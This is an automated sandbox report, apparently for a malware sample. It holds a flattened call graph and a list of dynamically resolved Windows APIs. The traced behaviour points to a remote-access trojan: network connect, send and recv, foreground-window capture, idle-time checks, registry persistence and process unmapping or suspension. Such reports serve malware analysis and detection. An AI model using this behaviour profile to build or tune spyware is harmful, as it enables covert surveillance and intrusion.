414fe7 47342->47343 47846 40489e WSAStartup 47343->47846 47345 414ff1 47346 401e65 22 API calls 47345->47346 47347 414ffa 47346->47347 47348 401e65 22 API calls 47347->47348 47374 415079 47347->47374 47349 415013 47348->47349 47350 401e65 22 API calls 47349->47350 47351 415024 47350->47351 47353 401e65 22 API calls 47351->47353 47352 41beac 28 API calls 47352->47374 47354 415035 47353->47354 47356 401e65 22 API calls 47354->47356 47355 406c59 28 API calls 47355->47374 47357 415046 47356->47357 47360 401e65 22 API calls 47357->47360 47358 402f10 28 API calls 47358->47374 47359 401fe2 28 API calls 47359->47374 47361 415057 47360->47361 47362 401e65 22 API calls 47361->47362 47363 415069 47362->47363 48006 40473d 89 API calls 47363->48006 47365 406383 28 API calls 47365->47374 47366 401e65 22 API calls 47366->47374 47368 4151c7 WSAGetLastError 48007 41cb72 30 API calls 47368->48007 47373 402093 28 API calls 47373->47374 47374->47352 47374->47355 47374->47358 47374->47359 47374->47365 47374->47366 47374->47368 47374->47373 47377 401fd8 11 API calls 47374->47377 47378 40531e 28 API calls 47374->47378 47379 401e8d 11 API calls 47374->47379 47380 43bb2c 40 API calls 47374->47380 47382 41b580 80 API calls 47374->47382 47385 409097 28 API calls 47374->47385 47387 4020f6 28 API calls 47374->47387 47388 413733 3 API calls 47374->47388 47389 4135e1 31 API calls 47374->47389 47390 40417e 28 API calls 47374->47390 47395 401e65 22 API calls 47374->47395 47847 414f24 47374->47847 47853 40482d 47374->47853 47860 404f51 47374->47860 47875 4048c8 connect 47374->47875 47935 41b871 47374->47935 47938 4145f8 47374->47938 47941 441ed1 47374->47941 47945 40ddc4 47374->47945 47951 41bcd3 47374->47951 47954 41bdaf 47374->47954 47958 41bc1f 47374->47958 47992 404e26 WaitForSingleObject 47374->47992 48008 4052fd 28 API calls 47374->48008 47377->47374 47378->47374 47379->47374 47381 415b0a Sleep 47380->47381 47381->47374 47382->47374 47385->47374 47387->47374 47388->47374 47389->47374 47390->47374 47396 415474 GetTickCount 47395->47396 47397 41bc1f 28 API calls 47396->47397 47408 415491 47397->47408 47399 41bc1f 28 API calls 47399->47408 47401 41bdaf 28 API calls 47401->47408 47404 402ea1 28 API calls 47404->47408 47405 406383 28 API calls 47405->47408 47406 402f10 28 API calls 47406->47408 47408->47399 47408->47401 47408->47404 47408->47405 47408->47406 47409 401fd8 11 API calls 47408->47409 47410 401f09 11 API calls 47408->47410 47963 41bb77 GetLastInputInfo GetTickCount 47408->47963 47964 41bb27 47408->47964 47969 40f90c GetLocaleInfoA 47408->47969 47972 402f31 28 API calls 47408->47972 47973 404c10 47408->47973 48009 404aa1 61 API calls ctype 47408->48009 47409->47408 47410->47408 47413 402093 28 API calls 47418 415a4a 47413->47418 47414 41b580 80 API calls 47414->47418 47415 415aac CreateThread 47415->47418 48178 41ada8 106 API calls 47415->48178 47416 401fd8 11 API calls 47416->47418 47417 401f09 11 API calls 47417->47418 47418->47374 47418->47413 47418->47414 47418->47415 47418->47416 47418->47417 48010 40b08c 85 API calls 47418->48010 47419->46831 47420->46838 47421->46843 47424 4020df 11 API calls 47423->47424 47425 406c65 47424->47425 47426 4032a0 28 API calls 47425->47426 47427 406c82 47426->47427 47427->46864 47429 40ebdf 47428->47429 47430 4135ae RegQueryValueExA RegCloseKey 47428->47430 47429->46861 47429->46878 47430->47429 47431->46868 47432->46897 47433->46889 47434->46881 47435->46896 48179 401f86 47436->48179 47439 40dae0 47443 41c048 2 API calls 47439->47443 47440 40daab 48183 41b645 29 API calls 47440->48183 47441 40dbd4 GetLongPathNameW 47445 40417e 28 API calls 47441->47445 47442 40daa1 47442->47441 47446 40dae5 47443->47446 47449 40dbe9 47445->47449 47450 40dae9 47446->47450 47451 40db3b 47446->47451 47447 40dab4 47448 401f13 28 API calls 47447->47448 47452 40dabe 47448->47452 47453 40417e 28 API calls 47449->47453 47455 40417e 28 API calls 47450->47455 47454 40417e 28 API calls 47451->47454 47459 401f09 11 API calls 47452->47459 47456 40dbf8 47453->47456 47457 40db49 47454->47457 47458 40daf7 47455->47458 48186 40de0c 28 API calls 47456->48186 47463 40417e 28 API calls 47457->47463 47464 40417e 28 API calls 47458->47464 47459->47442 47461 40dc0b 48187 402fa5 28 API calls 47461->48187 47467 40db5f 47463->47467 47465 40db0d 47464->47465 48184 402fa5 28 API calls 47465->48184 47466 40dc16 48188 402fa5 28 API calls 47466->48188 48185 402fa5 28 API calls 47467->48185 47471 40db6a 47475 401f13 28 API calls 47471->47475 47472 40db18 47476 401f13 28 API calls 47472->47476 47473 40dc20 47474 401f09 11 API calls 47473->47474 47477 40dc2a 47474->47477 47478 40db75 47475->47478 47479 40db23 47476->47479 47480 401f09 11 API calls 47477->47480 47481 401f09 11 API calls 47478->47481 47482 401f09 11 API calls 47479->47482 47483 40dc33 47480->47483 47484 40db7e 47481->47484 47485 40db2c 47482->47485 47486 401f09 11 API calls 47483->47486 47487 401f09 11 API calls 47484->47487 47488 401f09 11 API calls 47485->47488 47489 40dc3c 47486->47489 47487->47452 47488->47452 47490 401f09 11 API calls 47489->47490 47491 40dc45 47490->47491 47492 401f09 11 API calls 47491->47492 47493 40dc4e 47492->47493 47493->46955 47494->46968 47495->46989 47497 413759 RegQueryValueExA RegCloseKey 47496->47497 47498 41377d 47496->47498 47497->47498 47498->46948 47499->46982 47504 434563 47500->47504 47501 43bda0 ___std_exception_copy 21 API calls 47501->47504 47502 40f10c 47502->47020 47504->47501 47504->47502 48189 443001 7 API calls 2 library calls 47504->48189 48190 434c99 RaiseException Concurrency::cancel_current_task __CxxThrowException@8 47504->48190 48191 4352fb RaiseException Concurrency::cancel_current_task __CxxThrowException@8 47504->48191 47507->47051 47508->47038 47510->47083 47511->46888 47514 41b556 LoadResource LockResource SizeofResource 47513->47514 47515 40f419 47513->47515 47514->47515 47515->47117 47517 4020b7 28 API calls 47516->47517 47518 406e27 47517->47518 47518->47128 47524 40423a 47519->47524 47522->47131 47523->47150 47525 404243 47524->47525 47526 4023ce 11 API calls 47525->47526 47527 40424e 47526->47527 47528 402569 28 API calls 47527->47528 47529 4041b5 47528->47529 47529->47131 47530->47154 47534 4032aa 47532->47534 47533 4032c9 47533->47164 47534->47533 47535 4028e8 28 API calls 47534->47535 47535->47533 47537 4051fb 47536->47537 47546 405274 47537->47546 47539 405208 47539->47167 47541 402061 47540->47541 47542 4023ce 11 API calls 47541->47542 47543 40207b 47542->47543 47568 40267a 47543->47568 47547 405282 47546->47547 47548 405288 47547->47548 47549 40529e 47547->47549 47557 4025f0 47548->47557 47550 4052f5 47549->47550 47551 4052b6 47549->47551 47566 4028a4 22 API calls 47550->47566 47555 4028e8 28 API calls 47551->47555 47556 40529c 47551->47556 47555->47556 47556->47539 47558 402888 22 API calls 47557->47558 47559 402602 47558->47559 47560 402672 47559->47560 47561 402629 47559->47561 47567 4028a4 22 API calls 47560->47567 47564 4028e8 28 API calls 47561->47564 47565 40263b 47561->47565 47564->47565 47565->47556 47569 40268b 47568->47569 47570 4023ce 11 API calls 47569->47570 47571 40208d 47570->47571 47571->47170 47572->47178 47573->47180 47576 41b362 47575->47576 47577 41c055 GetCurrentProcess IsWow64Process 47575->47577 47579 4135e1 RegOpenKeyExA 47576->47579 47577->47576 47578 41c06c 47577->47578 47578->47576 47580 41360f RegQueryValueExA RegCloseKey 47579->47580 47581 413639 47579->47581 47580->47581 47582 402093 28 API calls 47581->47582 47583 41364e 47582->47583 47583->47191 47584->47199 47586 40b947 47585->47586 47591 402252 47586->47591 47588 40b952 47595 40b967 47588->47595 47590 40b961 47590->47210 47592 4022ac 47591->47592 47593 40225c 47591->47593 47592->47588 47593->47592 47602 402779 11 API calls std::_Deallocate 47593->47602 47596 40b9a1 47595->47596 47597 40b973 47595->47597 47614 4028a4 22 API calls 47596->47614 47603 4027e6 47597->47603 47601 40b97d 47601->47590 47602->47592 47604 4027ef 47603->47604 47605 402851 47604->47605 47606 4027f9 47604->47606 47616 4028a4 22 API calls 47605->47616 47609 402802 47606->47609 47611 402815 47606->47611 47615 402aea 28 API calls __EH_prolog 47609->47615 47612 402813 47611->47612 47613 402252 11 API calls 47611->47613 47612->47601 47613->47612 47615->47612 47617->47219 47619 402347 47618->47619 47620 402252 11 API calls 47619->47620 47621 4023c7 47620->47621 47621->47219 47623 4024f9 47622->47623 47624 40250a 28 API calls 47623->47624 47625 4020b1 47624->47625 47625->46961 47642 43ba8a 47626->47642 47628 43aed0 47648 43a837 36 API calls 2 library calls 47628->47648 47630 43ae95 47630->47628 47631 43aeaa 47630->47631 47641 43aeaf pre_c_initialization 47630->47641 47647 44062d 20 API calls __dosmaperr 47631->47647 47634 43aedc 47635 43af0b 47634->47635 47649 43bacf 40 API calls __Toupper 47634->47649 47638 43af77 47635->47638 47650 43ba36 20 API calls 2 library calls 47635->47650 47651 43ba36 20 API calls 2 library calls 47638->47651 47639 43b03e _swprintf 47639->47641 47652 44062d 20 API calls __dosmaperr 47639->47652 47641->47248 47643 43baa2 47642->47643 47644 43ba8f 47642->47644 47643->47630 47653 44062d 20 API calls __dosmaperr 47644->47653 47646 43ba94 pre_c_initialization 47646->47630 47647->47641 47648->47634 47649->47634 47650->47638 47651->47639 47652->47641 47653->47646 47660 401fb0 47654->47660 47656 402f1e 47657 402055 11 API calls 47656->47657 47658 402f2d 47657->47658 47658->47262 47659->47265 47661 4025f0 28 API calls 47660->47661 47662 401fbd 47661->47662 47662->47656 47664 40a162 47663->47664 47665 413584 3 API calls 47664->47665 47666 40a169 47665->47666 47667 40a197 47666->47667 47668 40a17d 47666->47668 47669 409097 28 API calls 47667->47669 47670 40a182 47668->47670 47671 409ed6 47668->47671 47672 40a1a5 47669->47672 47684 409097 47670->47684 47671->47012 47691 40a1b4 86 API calls 47672->47691 47677 40a195 47677->47671 47678->47290 47708 403222 47679->47708 47681 403022 47712 403262 47681->47712 47685 4090ad 47684->47685 47686 402252 11 API calls 47685->47686 47687 4090c7 47686->47687 47692 404267 47687->47692 47689 4090d5 47690 40a268 29 API calls 47689->47690 47690->47677 47704 40a2ae 164 API calls 47690->47704 47691->47671 47705 40a2a2 86 API calls 47691->47705 47706 40a2c4 49 API calls 47691->47706 47707 40a2b8 129 API calls 47691->47707 47693 402888 22 API calls 47692->47693 47694 40427b 47693->47694 47695 404290 47694->47695 47696 4042a5 47694->47696 47702 4042df 22 API calls 47695->47702 47697 4027e6 28 API calls 47696->47697 47701 4042a3 47697->47701 47699 404299 47703 402c48 22 API calls 47699->47703 47701->47689 47702->47699 47703->47701 47709 40322e 47708->47709 47718 403618 47709->47718 47711 40323b 47711->47681 47713 40326e 47712->47713 47714 402252 11 API calls 47713->47714 47715 403288 47714->47715 47716 402336 11 API calls 47715->47716 47717 403031 47716->47717 47717->47294 47719 403626 47718->47719 47720 403644 47719->47720 47721 40362c 47719->47721 47723 40369e 47720->47723 47725 40365c 47720->47725 47729 4036a6 28 API calls 47721->47729 47730 4028a4 22 API calls 47723->47730 47727 4027e6 28 API calls 47725->47727 47728 403642 47725->47728 47727->47728 47728->47711 47729->47728 47732 404186 47731->47732 47733 402252 11 API calls 47732->47733 47734 404191 47733->47734 47742 4041bc 47734->47742 47737 4042fc 47753 404353 47737->47753 47739 40430a 47740 403262 11 API calls 47739->47740 47741 404319 47740->47741 47741->47303 47743 4041c8 47742->47743 47746 4041d9 47743->47746 47745 40419c 47745->47737 47747 4041e9 47746->47747 47748 404206 47747->47748 47749 4041ef 47747->47749 47750 4027e6 28 API calls 47748->47750 47751 404267 28 API calls 47749->47751 47752 404204 47750->47752 47751->47752 47752->47745 47754 40435f 47753->47754 47757 404371 47754->47757 47756 40436d 47756->47739 47758 40437f 47757->47758 47759 404385 47758->47759 47760 40439e 47758->47760 47823 4034e6 28 API calls 47759->47823 47761 402888 22 API calls 47760->47761 47762 4043a6 47761->47762 47764 404419 47762->47764 47765 4043bf 47762->47765 47824 4028a4 22 API calls 47764->47824 47767 4027e6 28 API calls 47765->47767 47776 40439c 47765->47776 47767->47776 47776->47756 47823->47776 47831 43ab1a 47825->47831 47829 4138f4 47828->47829 47830 4138ca RegSetValueExA RegCloseKey 47828->47830 47829->47322 47830->47829 47834 43aa9b 47831->47834 47833 40170d 47833->47320 47835 43aaaa 47834->47835 47836 43aabe 47834->47836 47840 44062d 20 API calls __dosmaperr 47835->47840 47838 43aaaf pre_c_initialization __alldvrm 47836->47838 47841 4489d7 11 API calls 2 library calls 47836->47841 47838->47833 47840->47838 47841->47838 47843 41b98a ctype ___scrt_fastfail 47842->47843 47844 402093 28 API calls 47843->47844 47845 414f84 47844->47845 47845->47328 47846->47345 47848 414f33 47847->47848 47849 414f3d WSASetLastError 47847->47849 48011 414dc1 29 API calls ___std_exception_copy 47848->48011 47849->47374 47851 414f38 47851->47849 47854 404846 socket 47853->47854 47855 404839 47853->47855 47857 404860 CreateEventW 47854->47857 47858 404842 47854->47858 48012 40489e WSAStartup 47855->48012 47857->47374 47858->47374 47859 40483e 47859->47854 47859->47858 47861 404fea 47860->47861 47862 404f65 47860->47862 47861->47374 47863 404f6e 47862->47863 47864 404fc0 CreateEventA CreateThread 47862->47864 47865 404f7d GetLocalTime 47862->47865 47863->47864 47864->47861 48014 405150 47864->48014 47866 41bc1f 28 API calls 47865->47866 47867 404f91 47866->47867 48013 4052fd 28 API calls 47867->48013 47876 404a1b 47875->47876 47877 4048ee 47875->47877 47878 40497e 47876->47878 47879 404a21 WSAGetLastError 47876->47879 47877->47878 47881 40531e 28 API calls 47877->47881 47901 404923 47877->47901 47878->47374 47879->47878 47880 404a31 47879->47880 47882 404932 47880->47882 47883 404a36 47880->47883 47886 40490f 47881->47886 47888 402093 28 API calls 47882->47888 48029 41cb72 30 API calls 47883->48029 47885 40492b 47885->47882 47894 404941 47885->47894 47889 402093 28 API calls 47886->47889 47891 404a80 47888->47891 47892 40491e 47889->47892 47890 404a40 48030 4052fd 28 API calls 47890->48030 47895 402093 28 API calls 47891->47895 47896 41b580 80 API calls 47892->47896 47898 404950 47894->47898 47899 404987 47894->47899 47900 404a8f 47895->47900 47896->47901 47905 402093 28 API calls 47898->47905 48026 421ad1 54 API calls 47899->48026 47906 41b580 80 API calls 47900->47906 48018 420cf1 27 API calls 47901->48018 47909 40495f 47905->47909 47906->47878 47907 40498f 47910 4049c4 47907->47910 47911 404994 47907->47911 47913 402093 28 API calls 47909->47913 48028 420e97 28 API calls 47910->48028 47914 402093 28 API calls 47911->47914 47916 40496e 47913->47916 47918 4049a3 47914->47918 47919 41b580 80 API calls 47916->47919 47921 402093 28 API calls 47918->47921 47922 404973 47919->47922 47920 4049cc 47923 4049f9 CreateEventW CreateEventW 47920->47923 47925 402093 28 API calls 47920->47925 47924 4049b2 47921->47924 48019 420d31 47922->48019 47923->47878 47927 41b580 80 API calls 47924->47927 47926 4049e2 47925->47926 47929 402093 28 API calls 47926->47929 47930 4049b7 47927->47930 47931 4049f1 47929->47931 48027 421143 52 API calls 47930->48027 47933 41b580 80 API calls 47931->47933 47934 4049f6 47933->47934 47934->47923 48033 41b847 GlobalMemoryStatusEx 47935->48033 47937 41b886 47937->47374 48034 4145bb 47938->48034 47942 441edd 47941->47942 48072 441ccd 47942->48072 47944 441efe 47944->47374 47946 40dde0 47945->47946 47947 41353a 3 API calls 47946->47947 47948 40dde7 47947->47948 47949 413584 3 API calls 47948->47949 47950 40ddff 47948->47950 47949->47950 47950->47374 47952 4020b7 28 API calls 47951->47952 47953 41bce8 47952->47953 47953->47374 47955 41bdbc 47954->47955 47956 4020b7 28 API calls 47955->47956 47957 41bdce 47956->47957 47957->47374 47959 441ed1 20 API calls 47958->47959 47960 41bc43 47959->47960 47961 402093 28 API calls 47960->47961 47962 41bc51 47961->47962 47962->47374 47963->47408 47965 436f10 ___scrt_fastfail 47964->47965 47966 41bb46 GetForegroundWindow GetWindowTextW 47965->47966 47967 40417e 28 API calls 47966->47967 47968 41bb70 47967->47968 47968->47408 47970 402093 28 API calls 47969->47970 47971 40f931 47970->47971 47971->47408 47972->47408 47974 4020df 11 API calls 47973->47974 47975 404c27 47974->47975 47976 4020df 11 API calls 47975->47976 47984 404c30 47976->47984 47977 43bda0 ___std_exception_copy 21 API calls 47977->47984 47979 404c96 47981 404ca1 47979->47981 47979->47984 47980 4020b7 28 API calls 47980->47984 47983 404e26 99 API calls 47981->47983 47982 401fe2 28 API calls 47982->47984 47985 404ca8 47983->47985 47984->47977 47984->47979 47984->47980 47984->47982 47986 401fd8 11 API calls 47984->47986 48077 404cc3 47984->48077 48089 404b96 57 API calls 47984->48089 47987 401fd8 11 API calls 47985->47987 47986->47984 47988 404cb1 47987->47988 47989 401fd8 11 API calls 47988->47989 47990 404cba 47989->47990 47990->47418 47993 404e40 SetEvent CloseHandle 47992->47993 47994 404e57 closesocket 47992->47994 47995 404ed8 47993->47995 47996 404e64 47994->47996 47995->47374 47997 404e73 47996->47997 47998 404e7a 47996->47998 48177 4050e4 84 API calls 47997->48177 48000 404e8c WaitForSingleObject 47998->48000 48001 404ece SetEvent CloseHandle 47998->48001 48002 420d31 3 API calls 48000->48002 48001->47995 48003 404e9b SetEvent WaitForSingleObject 48002->48003 48004 420d31 3 API calls 48003->48004 48005 404eb3 SetEvent CloseHandle CloseHandle 48004->48005 48005->48001 48006->47374 48007->47374 48009->47408 48010->47418 48011->47851 48012->47859 48017 40515c 102 API calls 48014->48017 48016 405159 48017->48016 48018->47885 48020 41e7a2 48019->48020 48021 420d39 48019->48021 48022 41e7b0 48020->48022 48031 41d8ec DeleteCriticalSection EnterCriticalSection LeaveCriticalSection 48020->48031 48021->47878 48032 41e4d2 DeleteCriticalSection EnterCriticalSection LeaveCriticalSection 48022->48032 48025 41e7b7 48026->47907 48027->47922 48028->47920 48029->47890 48031->48022 48032->48025 48033->47937 48037 41458e 48034->48037 48038 4145a3 ___scrt_initialize_default_local_stdio_options 48037->48038 48041 43f7ed 48038->48041 48044 43c540 48041->48044 48045 43c568 48044->48045 48047 43c580 48044->48047 48066 44062d 20 API calls __dosmaperr 48045->48066 48047->48045 48048 43c588 48047->48048 48067 43a837 36 API calls 2 library calls 48048->48067 48050 43c598 48068 43ccc6 20 API calls 2 library calls 48050->48068 48051 43c56d pre_c_initialization 48059 43502b 48051->48059 48054 4145b1 48054->47374 48055 43c610 48069 43d334 51 API calls 3 library calls 48055->48069 48058 43c61b 48070 43cd30 20 API calls _free 48058->48070 48060 435036 IsProcessorFeaturePresent 48059->48060 48061 435034 48059->48061 48063 435078 48060->48063 48061->48054 48071 43503c SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 48063->48071 48065 43515b 48065->48054 48066->48051 48067->48050 48068->48055 48069->48058 48070->48051 48071->48065 48073 441ce4 48072->48073 48075 441d1b pre_c_initialization 48073->48075 48076 44062d 20 API calls __dosmaperr 48073->48076 48075->47944 48076->48075 48078 4020df 11 API calls 48077->48078 48079 404cde 48078->48079 48080 404e13 48079->48080 48083 401fd8 11 API calls 48079->48083 48084 4020f6 28 API calls 48079->48084 48085 401fc0 28 API calls 48079->48085 48087 4041a2 28 API calls 48079->48087 48088 401fe2 28 API calls 48079->48088 48081 401fd8 11 API calls 48080->48081 48082 404e1c 48081->48082 48082->47979 48083->48079 48084->48079 48086 404dad CreateEventA CreateThread WaitForSingleObject CloseHandle 48085->48086 48086->48079 48090 415b25 48086->48090 48087->48079 48088->48079 48089->47984 48091 4020f6 28 API calls 48090->48091 48092 415b47 SetEvent 48091->48092 48093 415b5c 48092->48093 48094 4041a2 28 API calls 48093->48094 48095 415b76 48094->48095 48096 4020f6 28 API calls 48095->48096 48097 415b86 48096->48097 48098 4020f6 28 API calls 48097->48098 48099 415b98 48098->48099 48100 41beac 28 API calls 48099->48100 48101 415ba1 48100->48101 48102 4170c4 48101->48102 48104 415bc1 GetTickCount 48101->48104 48105 415d6a 48101->48105 48103 401e8d 11 API calls 48102->48103 48106 4170cd 48103->48106 48107 41bc1f 28 API calls 48104->48107 48105->48102 48167 415d20 48105->48167 48108 401fd8 11 API calls 48106->48108 48109 415bd2 48107->48109 48111 4170d9 48108->48111 48169 41bb77 GetLastInputInfo GetTickCount 48109->48169 48113 401fd8 11 API calls 48111->48113 48115 4170e5 48113->48115 48114 415bde 48116 41bc1f 28 API calls 48114->48116 48117 415be9 48116->48117 48118 41bb27 30 API calls 48117->48118 48119 415bf7 48118->48119 48120 41bdaf 28 API calls 48119->48120 48121 415c05 48120->48121 48122 401e65 22 API calls 48121->48122 48123 415c13 48122->48123 48170 402f31 28 API calls 48123->48170 48125 415c21 48171 402ea1 28 API calls 48125->48171 48127 415c30 48128 402f10 28 API calls 48127->48128 48129 415c3f 48128->48129 48172 402ea1 28 API calls 48129->48172 48131 415c4e 48132 402f10 28 API calls 48131->48132 48133 415c5a 48132->48133 48173 402ea1 28 API calls 48133->48173 48135 415c64 48174 404aa1 61 API calls ctype 48135->48174 48137 415c73 48138 401fd8 11 API calls 48137->48138 48139 415c7c 48138->48139 48140 401fd8 11 API calls 48139->48140 48141 415c88 48140->48141 48142 401fd8 11 API calls 48141->48142 48143 415c94 48142->48143 48144 401fd8 11 API calls 48143->48144 48145 415ca0 48144->48145 48146 401fd8 11 API calls 48145->48146 48147 415cac 48146->48147 48148 401fd8 11 API calls 48147->48148 48149 415cb8 48148->48149 48150 401f09 11 API calls 48149->48150 48151 415cc1 48150->48151 48152 401fd8 11 API calls 48151->48152 48153 415cca 48152->48153 48154 401fd8 11 API calls 48153->48154 48155 415cd3 48154->48155 48156 401e65 22 API calls 48155->48156 48157 415cde 48156->48157 48158 43bb2c 40 API calls 48157->48158 48159 415ceb 48158->48159 48160 415cf0 48159->48160 48161 415d16 48159->48161 48163 415d09 48160->48163 48164 415cfe 48160->48164 48162 401e65 22 API calls 48161->48162 48162->48167 48166 404f51 105 API calls 48163->48166 48175 404ff4 82 API calls 48164->48175 48168 415d04 48166->48168 48167->48102 48176 4050e4 84 API calls 48167->48176 48168->48102 48169->48114 48170->48125 48171->48127 48172->48131 48173->48135 48174->48137 48175->48168 48176->48168 48177->47998 48180 401f8e 48179->48180 48181 402252 11 API calls 48180->48181 48182 401f99 48181->48182 48182->47439 48182->47440 48182->47442 48183->47447 48184->47472 48185->47471 48186->47461 48187->47466 48188->47473 48189->47504 48194 40f7fd 48192->48194 48193 413584 3 API calls 48193->48194 48194->48193 48196 40f8a1 48194->48196 48198 40f891 Sleep 48194->48198 48202 40f82f 48194->48202 48195 409097 28 API calls 48195->48202 48197 409097 28 API calls 48196->48197 48200 40f8ac 48197->48200 48198->48194 48199 41bcef 28 API calls 48199->48202 48203 41bcef 28 API calls 48200->48203 48202->48195 48202->48198 48202->48199 48207 401f09 11 API calls 48202->48207 48210 402093 28 API calls 48202->48210 48214 4137aa 14 API calls 48202->48214 48225 40d0d1 112 API calls ___scrt_fastfail 48202->48225 48226 41384f 14 API calls 48202->48226 48204 40f8b8 48203->48204 48227 41384f 14 API calls 48204->48227 48207->48202 48208 40f8cb 48209 401f09 11 API calls 48208->48209 48211 40f8d7 48209->48211 48210->48202 48212 402093 28 API calls 48211->48212 48213 40f8e8 48212->48213 48215 4137aa 14 API calls 48213->48215 48214->48202 48216 40f8fb 48215->48216 48228 41288b TerminateProcess WaitForSingleObject 48216->48228 48218 40f903 ExitProcess 48229 412829 62 API calls 48220->48229 48226->48202 48227->48208 48228->48218 48230 42f97e 48231 42f989 48230->48231 48233 42f99d 48231->48233 48234 432f7f 48231->48234 48235 432f8a 48234->48235 48236 432f8e 48234->48236 48235->48233 48238 440f5d 48236->48238 48239 446206 48238->48239 48240 446213 48239->48240 48241 44621e 48239->48241 48251 4461b8 48240->48251 48243 446226 48241->48243 48249 44622f __Getctype 48241->48249 48258 446802 48243->48258 48245 446234 48264 44062d 20 API calls __dosmaperr 48245->48264 48246 446259 RtlReAllocateHeap 48247 44621b 48246->48247 48246->48249 48247->48235 48249->48245 48249->48246 48265 443001 7 API calls 2 library calls 48249->48265 48252 4461f6 48251->48252 48256 4461c6 __Getctype 48251->48256 48267 44062d 20 API calls __dosmaperr 48252->48267 48253 4461e1 RtlAllocateHeap 48255 4461f4 48253->48255 48253->48256 48255->48247 48256->48252 48256->48253 48266 443001 7 API calls 2 library calls 48256->48266 48259 44680d RtlFreeHeap 48258->48259 48263 446836 __dosmaperr 48258->48263 48260 446822 48259->48260 48259->48263 48268 44062d 20 API calls __dosmaperr 48260->48268 48262 446828 GetLastError 48262->48263 48263->48247 48264->48247 48265->48249 48266->48256 48267->48255 48268->48262 48269 40165e 48270 401666 48269->48270 48271 401669 48269->48271 48272 4016a8 48271->48272 48274 401696 48271->48274 48273 43455e new 22 API calls 48272->48273 48275 40169c 48273->48275 48276 43455e new 22 API calls 48274->48276 48276->48275 48277 426cdc 48282 426d59 send 48277->48282 48283 41e04e 48284 41e063 ctype ___scrt_fastfail 48283->48284 48296 41e266 48284->48296 48302 432f55 21 API calls ___std_exception_copy 48284->48302 48287 41e277 48288 41e21a 48287->48288 48298 432f55 21 API calls ___std_exception_copy 48287->48298 48290 41e213 ___scrt_fastfail 48290->48288 48303 432f55 21 API calls ___std_exception_copy 48290->48303 48292 41e2b0 ___scrt_fastfail 48292->48288 48299 4335db 48292->48299 48294 41e240 ___scrt_fastfail 48294->48288 48304 432f55 21 API calls ___std_exception_copy 48294->48304 48296->48288 48297 41dbf3 DeleteCriticalSection EnterCriticalSection LeaveCriticalSection ___scrt_fastfail 48296->48297 48297->48287 48298->48292 48305 4334fa 48299->48305 48301 4335e3 48301->48288 48302->48290 48303->48294 48304->48296 48306 433513 48305->48306 48310 433509 48305->48310 48306->48310 48311 432f55 21 API calls ___std_exception_copy 48306->48311 48308 433534 48308->48310 48312 4338c8 CryptAcquireContextA 48308->48312 48310->48301 48311->48308 48313 4338e4 48312->48313 48314 4338e9 CryptGenRandom 48312->48314 48313->48310 48314->48313 48315 4338fe CryptReleaseContext 48314->48315 48315->48313 48316 426c6d 48322 426d42 recv 48316->48322

                                                                                          Executed Functions

                                                                                          Function 0041CBE1 Relevance: 148.9, APIs: 52, Strings: 33, Instructions: 176libraryloaderCOMMON
                                                                                          Download Yara Rule

                                                                                          Control-flow Graph

                                                                                          APIs
                                                                                          • LoadLibraryA.KERNEL32(Psapi,GetProcessImageFileNameW,?,?,?,?,0040EA1C), ref: 0041CBF6
                                                                                          • GetProcAddress.KERNEL32(00000000), ref: 0041CBFF
                                                                                          • GetModuleHandleA.KERNEL32(Kernel32,GetProcessImageFileNameW,?,?,?,?,0040EA1C), ref: 0041CC16
                                                                                          • GetProcAddress.KERNEL32(00000000), ref: 0041CC19
                                                                                          • LoadLibraryA.KERNEL32(shcore,SetProcessDpiAwareness,?,?,?,?,0040EA1C), ref: 0041CC2B
                                                                                          • GetProcAddress.KERNEL32(00000000), ref: 0041CC2E
                                                                                          • LoadLibraryA.KERNEL32(user32,SetProcessDpiAwareness,?,?,?,?,0040EA1C), ref: 0041CC3F
                                                                                          • GetProcAddress.KERNEL32(00000000), ref: 0041CC42
                                                                                          • LoadLibraryA.KERNEL32(ntdll,NtUnmapViewOfSection,?,?,?,?,0040EA1C), ref: 0041CC54
                                                                                          • GetProcAddress.KERNEL32(00000000), ref: 0041CC57
                                                                                          • LoadLibraryA.KERNEL32(kernel32,GlobalMemoryStatusEx,?,?,?,?,0040EA1C), ref: 0041CC63
                                                                                          • GetProcAddress.KERNEL32(00000000), ref: 0041CC66
                                                                                          • GetModuleHandleA.KERNEL32(kernel32,IsWow64Process,?,?,?,?,0040EA1C), ref: 0041CC77
                                                                                          • GetProcAddress.KERNEL32(00000000), ref: 0041CC7A
                                                                                          • GetModuleHandleA.KERNEL32(kernel32,GetComputerNameExW,?,?,?,?,0040EA1C), ref: 0041CC8B
                                                                                          • GetProcAddress.KERNEL32(00000000), ref: 0041CC8E
                                                                                          • LoadLibraryA.KERNEL32(Shell32,IsUserAnAdmin,?,?,?,?,0040EA1C), ref: 0041CC9F
                                                                                          • GetProcAddress.KERNEL32(00000000), ref: 0041CCA2
                                                                                          • GetModuleHandleA.KERNEL32(kernel32,SetProcessDEPPolicy,?,?,?,?,0040EA1C), ref: 0041CCB3
                                                                                          • GetProcAddress.KERNEL32(00000000), ref: 0041CCB6
                                                                                          • GetModuleHandleA.KERNEL32(user32,EnumDisplayDevicesW,?,?,?,?,0040EA1C), ref: 0041CCC7
                                                                                          • GetProcAddress.KERNEL32(00000000), ref: 0041CCCA
                                                                                          • GetModuleHandleA.KERNEL32(user32,EnumDisplayMonitors,?,?,?,?,0040EA1C), ref: 0041CCDB
                                                                                          • GetProcAddress.KERNEL32(00000000), ref: 0041CCDE
                                                                                          • GetModuleHandleA.KERNEL32(user32,GetMonitorInfoW,?,?,?,?,0040EA1C), ref: 0041CCEF
                                                                                          • GetProcAddress.KERNEL32(00000000), ref: 0041CCF2
                                                                                          • GetModuleHandleA.KERNEL32(kernel32,GetSystemTimes,?,?,?,?,0040EA1C), ref: 0041CD03
                                                                                          • GetProcAddress.KERNEL32(00000000), ref: 0041CD06
                                                                                          • LoadLibraryA.KERNEL32(Shlwapi,0000000C,?,?,?,?,0040EA1C), ref: 0041CD14
                                                                                          • GetProcAddress.KERNEL32(00000000), ref: 0041CD17
                                                                                          • LoadLibraryA.KERNEL32(kernel32,GetConsoleWindow,?,?,?,?,0040EA1C), ref: 0041CD28
                                                                                          • GetProcAddress.KERNEL32(00000000), ref: 0041CD2B
                                                                                          • GetModuleHandleA.KERNEL32(ntdll,NtSuspendProcess,?,?,?,?,0040EA1C), ref: 0041CD38
                                                                                          • GetProcAddress.KERNEL32(00000000), ref: 0041CD3B
